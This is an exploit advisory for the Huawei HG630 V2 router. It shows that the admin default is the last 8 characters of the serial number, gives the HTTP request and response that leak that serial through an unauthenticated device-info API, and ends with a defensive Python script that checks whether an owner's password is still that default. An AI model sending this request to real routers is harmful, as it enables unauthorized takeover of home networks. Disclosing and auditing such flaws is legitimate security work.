# Title: Huawei HG630 2 Router - Authentication Bypass
# Date: 2020-04-13
# Author: Eslam Medhat
# Vendor Homepage: www.huawei.com
# Version: HG630 V2
# HardwareVersion: VER.B
# CVE: N/A

#POC:
The default password of this router is the last 8 characters of the
device's serial number, which is found on the back of the device.
An attacker can leak the serial number via the web app API, as in the
following:

************************Request************************
GET /api/system/deviceinfo HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.1/
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: SessionID_R3=0PVHKCwY01etBMntI9TZZRvYX04emsjws0Be4EQ8VcoojhWaRQpOV9E0BbAktJDwzI0au6s1xgl0Cn7bvN9rejjMhJCI1t07f2XDnbo09tjN4mcG0XMyXbMoJLjViHm

************************Response************************
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Date: Fri, 01 Jan 2010 09:14:47 GMT
Connection: Keep-Alive
Content-Language: en
Content-Type: application/javascript
Content-Length: 141

while(1);/*{"DeviceName":"HG630 V2","SerialNumber":"T5D7S18815905395","ManufacturerOUI":"00E0FC","UpTime":33288,"HardwareVersion":"VER.B"}*/

You can use that serial number to log in to the router.

#Reference:
https://www.youtube.com/watch?v=vOrIL7L_cVc
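
A defender-side check for the behaviour described in the POC, added here as an example and not part of the original advisory: it parses a captured deviceinfo response offline and reports whether the admin password an owner supplies is still the serial-derived default. The function names, the remediation strings and the second sample password are assumptions made for illustration.

```python
import hmac
import json
import re

# Response body from the POC above, with "HG630 V2" rejoined onto one line.
SAMPLE_BODY = ('while(1);/*{"DeviceName":"HG630 V2","SerialNumber":"T5D7S18815905395",'
               '"ManufacturerOUI":"00E0FC","UpTime":33288,"HardwareVersion":"VER.B"}*/')

# The API wraps its JSON in a while(1); prefix and a JavaScript comment.
_WRAPPER = re.compile(r'^\s*while\(1\);\s*/\*(.*)\*/\s*$', re.DOTALL)


def parse_deviceinfo(body: str) -> dict:
    """Unwrap and decode a /api/system/deviceinfo response body."""
    m = _WRAPPER.match(body)
    payload = m.group(1) if m else body  # tolerate an unwrapped body
    data = json.loads(payload)
    if not isinstance(data, dict):
        raise ValueError("deviceinfo body is not a JSON object")
    return data


def audit_admin_password(body: str, current_password: str) -> dict:
    """Report whether the serial is disclosed and whether the password the
    owner has configured is still the last 8 characters of that serial."""
    serial = str(parse_deviceinfo(body).get("SerialNumber", ""))
    exposed = len(serial) >= 8
    # Constant-time comparison so the check itself does not leak the match.
    is_default = exposed and hmac.compare_digest(
        current_password.encode(), serial[-8:].encode())
    if is_default:
        action = "change the admin password"
    elif exposed:
        action = "keep the management interface off untrusted networks"
    else:
        action = "none"
    return {"serial_exposed": exposed,
            "password_is_default": is_default,
            "action": action}


if __name__ == "__main__":
    # Constructed inputs: the first mimics an unchanged factory password.
    for pw in ("15905395", "a-long-unrelated-passphrase"):
        print(audit_admin_password(SAMPLE_BODY, pw))
```
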